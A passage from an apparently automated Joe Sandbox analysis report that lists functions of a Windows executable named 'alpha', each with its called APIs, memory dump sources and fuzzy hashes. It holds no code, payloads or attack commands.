                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029679093-0
                                                                                                          • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                          • Instruction ID: 73b11edf61ddf1ebe1b17f8dc85a1c5f79e8e665af112f506064334362017b63
                                                                                                          • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                          • Instruction Fuzzy Hash: DD315032706BC189EB229F29E8943E8B7A4FB49B88F454235CA4D47768DF3CD655C710
                                                                                                          Function 00007FF7AB14E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2448200120-0
                                                                                                          • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                          • Instruction ID: 06168ccd0c367d70dbf2a1f7c599963f6391cf850e417a0f5040cbfe38ee8d0e
                                                                                                          • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                          • Instruction Fuzzy Hash: C721A032A0A746C7EB067B19F400279F6A1FB88B49F964135D90E037B4DF3CE4018B15
                                                                                                          Function 00007FF7AB137CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                          • Instruction ID: 3807b6023560b74fb4de1106b98241971445db280ba61e608a7451c89c8febc0
                                                                                                          • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                          • Instruction Fuzzy Hash: 4021B761A0AB4281ED05AB1AF540075FBA1FF49BD4B969230DD1F03775DF3CE4458720
                                                                                                          Function 00007FF7AB126A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB133D0C
                                                                                                            • Part of subcall function 00007FF7AB133C24: towupper.MSVCRT ref: 00007FF7AB133D2F
                                                                                                            • Part of subcall function 00007FF7AB133C24: iswalpha.MSVCRT ref: 00007FF7AB133D4F
                                                                                                            • Part of subcall function 00007FF7AB133C24: towupper.MSVCRT ref: 00007FF7AB133D75
                                                                                                            • Part of subcall function 00007FF7AB133C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133DBF
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB126ABF
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB126AD3
                                                                                                            • Part of subcall function 00007FF7AB126B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7AB126AE8,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B8B
                                                                                                            • Part of subcall function 00007FF7AB126B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7AB126AE8,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B97
                                                                                                            • Part of subcall function 00007FF7AB126B84: RtlFreeHeap.NTDLL ref: 00007FF7AB126BAF
                                                                                                            • Part of subcall function 00007FF7AB126B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB126AF1,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B39
                                                                                                            • Part of subcall function 00007FF7AB126B30: RtlFreeHeap.NTDLL ref: 00007FF7AB126B4D
                                                                                                            • Part of subcall function 00007FF7AB126B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB126AF1,?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925), ref: 00007FF7AB126B59
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB14EA0F,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB126B03
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB126B17
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                          • String ID:
                                                                                                          • API String ID: 3512109576-0
                                                                                                          • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                          • Instruction ID: ef221b26c4df8a5456943d58a4139d1d6a656dfb9b730f378f56af8eaae560c5
                                                                                                          • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                          • Instruction Fuzzy Hash: F4217161A0A686C5EB06AB6DF4502B8BBA0FB59B48F958031C90E073B1DF2CA445C730
                                                                                                          Function 00007FF7AB12B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B6D0
                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B6E7
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B701
                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B715
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2549470565-0
                                                                                                          • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                          • Instruction ID: 72d572a0f6c6c83583a2d84a407b97cb511e2b9867d9cbaca9d54018084cb4dd
                                                                                                          • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                          • Instruction Fuzzy Hash: C0214835D0B746C6EA16AB19F490079F6A1FB49B88BCA9531DA0E037B4DF3DD845C320
                                                                                                          Function 00007FF7AB14CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D01C
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D033
                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D06D
                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D07F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                          • String ID:
                                                                                                          • API String ID: 1033415088-0
                                                                                                          • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                          • Instruction ID: aff7f8a0eeee78f4ec6a1a45f9aad2200e7d82181a29e8cf5dbfc494bd9089f6
                                                                                                          • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                          • Instruction Fuzzy Hash: 5811B231619A4287DB449B28F04417AFBA0FB8AB99F815235FA8F47B74DF3CC0458B10
                                                                                                          Function 00007FF7AB1259E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB125A2E
                                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF7AB125A4F
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB1437AA
                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7AB1437D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 22757656-0
                                                                                                          • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                          • Instruction ID: b80583a87bb6b2877c942ca41b6c084a879eb672d68dc36666041ce6942cb56c
                                                                                                          • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                          • Instruction Fuzzy Hash: 23116371A156458BE7116B1CF488339BA60F789B69F954734D62A073F0DF3CD5498B10
                                                                                                          Function 00007FF7AB145690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7AB145433,?,?,?,00007FF7AB1469B8,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1456C5
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB1456D9
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7AB145433,?,?,?,00007FF7AB1469B8,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1456FD
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB145711
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3859560861-0
                                                                                                          • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                          • Instruction ID: a90b74219940b8dfc7011aaec148f166a10b0dec604e085acbb527385370497d
                                                                                                          • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                          • Instruction Fuzzy Hash: BC111872A05B91C6EB019F5AF4440ADBBB4FB8DF88B998125DB4E03728DF38E456C750
                                                                                                          Function 00007FF7AB139158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                          • String ID:
                                                                                                          • API String ID: 140117192-0
                                                                                                          • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                          • Instruction ID: a6e7b3b9e1f5e90fbe5b384c0bf98059b8e048515a198359d05580735c393c91
                                                                                                          • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                          • Instruction Fuzzy Hash: EB21E47590AB4591E642AB0CF880769B3B4FB84758F910635DA8D43774EF7DE198CB20
                                                                                                          Function 00007FF7AB134AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AD6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AEF
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                            • Part of subcall function 00007FF7AB134A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                            • Part of subcall function 00007FF7AB134A14: memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                            • Part of subcall function 00007FF7AB134A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB13EE64
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB13EE78
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759988882-0
                                                                                                          • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                          • Instruction ID: 834429d60845de893133f9a9978a25b024af5f56d3877c6b77851a077493cf00
                                                                                                          • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                          • Instruction Fuzzy Hash: C3F0E161E16B4286EE5A676DF445178E9E1FF4EB45B8A9534C90F43370EE3CA4448630
                                                                                                          Function 00007FF7AB14F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 1606018815-0
                                                                                                          • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                          • Instruction ID: 48ad1b4e216bbe2a915d5c78361e3821d22225b874c50c2d081f9a59e31cef17
                                                                                                          • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                          • Instruction Fuzzy Hash: FEF0F831A26A42CBD6056B18F484179FA60FB8AB16F85A224DA0B033B4DF3CD0088B50
                                                                                                          Function 00007FF7AB12E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                            • Part of subcall function 00007FF7AB12EF40: wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          • longjmp.MSVCRT ref: 00007FF7AB13CCBC
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13CCE0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
